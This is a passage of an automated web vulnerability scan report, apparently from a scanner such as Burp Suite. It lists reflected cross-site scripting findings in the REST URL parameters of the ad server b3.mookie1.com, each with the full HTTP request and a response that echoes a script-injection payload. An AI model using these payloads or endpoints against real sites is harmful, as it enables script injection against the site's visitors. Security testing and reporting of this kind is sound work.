48%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:29:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/Allbb219"><script>alert(1)</script>78ec181fa99/575608553/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.43. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9881a"><script>alert(1)</script>c6906dcae59 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x909881a"><script>alert(1)</script>c6906dcae59 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 349
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/All/151663992/x909881a"><script>alert(1)</script>c6906dcae59/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.44. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5ae"><script>alert(1)</script>52171caeb1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader4b5ae"><script>alert(1)</script>52171caeb1d/PizzaHut_2H/201008/18-49/All/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader4b5ae"><script>alert(1)</script>52171caeb1d/PizzaHut_2H/201008/18-49/All/163063539/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.45. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c87"><script>alert(1)</script>0233bbd2840 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H35c87"><script>alert(1)</script>0233bbd2840/201008/18-49/All/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H35c87"><script>alert(1)</script>0233bbd2840/201008/18-49/All/850775827/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.46. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d094"><script>alert(1)</script>9007efdaf9b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/2010081d094"><script>alert(1)</script>9007efdaf9b/18-49/All/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/2010081d094"><script>alert(1)</script>9007efdaf9b/18-49/All/574424878/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.47. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4a9e"><script>alert(1)</script>d4940857063 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49d4a9e"><script>alert(1)</script>d4940857063/All/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49d4a9e"><script>alert(1)</script>d4940857063/All/867347935/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.48. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51ea"><script>alert(1)</script>cae4b9c680a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/Alle51ea"><script>alert(1)</script>cae4b9c680a/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/Alle51ea"><script>alert(1)</script>cae4b9c680a/855942083/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.49. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7bd8"><script>alert(1)</script>f004eba3524 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90a7bd8"><script>alert(1)</script>f004eba3524 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
